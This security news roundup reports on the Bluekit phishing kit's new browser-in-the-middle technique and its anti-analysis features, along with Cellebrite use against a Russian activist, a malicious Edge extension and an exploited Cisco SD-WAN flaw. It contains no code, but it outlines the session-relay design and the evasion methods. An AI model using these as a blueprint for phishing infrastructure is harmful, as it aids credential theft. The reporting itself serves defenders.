Bluekit Phishing Kit Adds Browser-in-the-Middle Tactic as Russia Targets Activists via Cellebrite

The Bluekit phishing-as-a-service platform has added browser-in-the-middle capabilities, according to a new report from Netcraft. Nearly 70 new hostnames tied to the service were identified in the past week alone. The technique gives attackers real-time access to victim sessions after login.

Bluekit first appeared in April with an AI assistant that supports multiple large language models including Llama, GPT-4.1, Claude, Gemini, and DeepSeek. The kit originally offered 40 templates targeting Outlook, Hotmail, Gmail, Yahoo, ProtonMail, iCloud, GitHub, and Ledger. Netcraft reports that Bluekit now uses the open-source JavaScript library rrweb to serialize the page's DOM and stream it over a WebSocket to the attacker. The attacker's browser loads the legitimate login page and relays input between victim and service. Authentication completes in the attacker's browser, granting a valid session token and unlimited access.

New Anti-Analysis Features in Bluekit

Before stealing credentials, Bluekit runs a comprehensive victim qualification system to filter out researchers and security crawlers. The latest version includes:

• Randomized CSS filters to defeat screenshot-based detection.
• A large, frequently changing obfuscated JavaScript bundle over 1 MB in size.
• Custom CAPTCHA that imitates Cloudflare or the target brand.
• Browser fingerprinting for RAM, CPU cores, screen resolution, language, headless browser detection, and anti-fingerprinting extensions.
• WebRTC-based IP mismatch detection to identify users behind proxies or VPNs.

Netcraft notes that rrweb itself is legitimate and widely used for session replay. Its presence alone is not an indicator of compromise. Latency on keyboard input and mouse clicks may signal a BitM attack.

Phone Cracking, Dairy Attacks, and Sandbox Escape

Separately, Russian authorities used Cellebrite phone-cracking tools to access the phone of human rights activist Andrey Pivovarov, according to Citizen Lab. This occurred even after the company canceled its contract with Russia. The incident underscores how forensic tools can outlive official agreements once in state hands.

A dairy manufacturer in Russia's Bashkortostan republic was also disrupted by a cyberattack, as reported by The Record. The incident follows a pattern of attacks on Russian food producers.

Researchers discovered a malicious Microsoft Edge extension that breaks out of the browser sandbox and installs ransomware. The extension abuses Native Messaging to bridge into the host operating system, according to TechRadar Pro.

A high-severity vulnerability in Cisco Catalyst SD-WAN Manager was exploited as early as March, months before its June disclosure, Google warned. The flaw allowed attackers to gain root access to affected devices.

Organizations facing these threats should monitor for unusual browser behavior, review extension permissions, and patch SD-WAN systems immediately. The Bluekit report provides signals including CSS filter manipulation, WebSocket connections on login pages, and WebRTC IP checks. But Netcraft advises these are not standalone indicators of compromise.